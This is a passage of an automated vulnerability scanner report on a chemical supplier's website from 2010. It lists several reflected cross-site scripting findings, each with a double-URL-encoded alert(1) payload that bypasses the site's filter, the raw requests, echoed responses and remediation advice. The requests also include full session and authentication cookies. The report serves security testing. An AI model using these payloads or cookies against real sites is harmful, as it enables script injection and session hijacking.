Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:46 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/functional-genomics-and-rnai/shrna75d2e";alert(1)//febfb9718bc/custom-services.html","E404") ;
   </script>
...[SNIP]...

1.549. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna/custom-services.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8c45%2522%253balert%25281%2529%252f%252f7c853d125b2 was submitted in the REST URL parameter 4. This input was echoed as f8c45";alert(1)//7c853d125b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/functional-genomics-and-rnai/shrna/f8c45%2522%253balert%25281%2529%252f%252f7c853d125b2 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/functional-genomics-and-rnai/shrna/f8c45";alert(1)//7c853d125b2","E404") ;
   </script>
...[SNIP]...

1.550. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/mission-custom-request.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna/mission-custom-request.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a2c1%2522%253balert%25281%2529%252f%252f0bfaa621c3 was submitted in the REST URL parameter 1. This input was echoed as 2a2c1";alert(1)//0bfaa621c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science2a2c1%2522%253balert%25281%2529%252f%252f0bfaa621c3/functional-genomics-and-rnai/shrna/mission-custom-request.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science2a2c1";alert(1)//0bfaa621c3/functional-genomics-and-rnai/shrna/mission-custom-request.html","E404") ;
   </script>
...[SNIP]...

1.551. http://www.sigmaaldrich.com/life-science/labware-and-equipment.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/labware-and-equipment.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c973%2522%253balert%25281%2529%252f%252f24796da3f66 was submitted in the REST URL parameter 1. This input was echoed as 9c973";alert(1)//24796da3f66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science9c973%2522%253balert%25281%2529%252f%252f24796da3f66/labware-and-equipment.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:37 GMT
Content-Length: 28943
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science9c973";alert(1)//24796da3f66/labware-and-equipment.html","E404") ;
   </script>
...[SNIP]...

1.552. http://www.sigmaaldrich.com/life-science/labware-and-equipment.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/labware-and-equipment.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6c34%2522%253balert%25281%2529%252f%252fbc5831b33bd was submitted in the REST URL parameter 2. This input was echoed as c6c34";alert(1)//bc5831b33bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/c6c34%2522%253balert%25281%2529%252f%252fbc5831b33bd HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:39 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/c6c34";alert(1)//bc5831b33bd","E404") ;
   </script>
...[SNIP]...

1.553. http://www.sigmaaldrich.com/life-science/learning-center.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/learning-center.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eb75%2522%253balert%25281%2529%252f%252f874a57ef240 was submitted in the REST URL parameter 1. This input was echoed as 2eb75";alert(1)//874a57ef240 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science2eb75%2522%253balert%25281%2529%252f%252f874a57ef240/learning-center.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
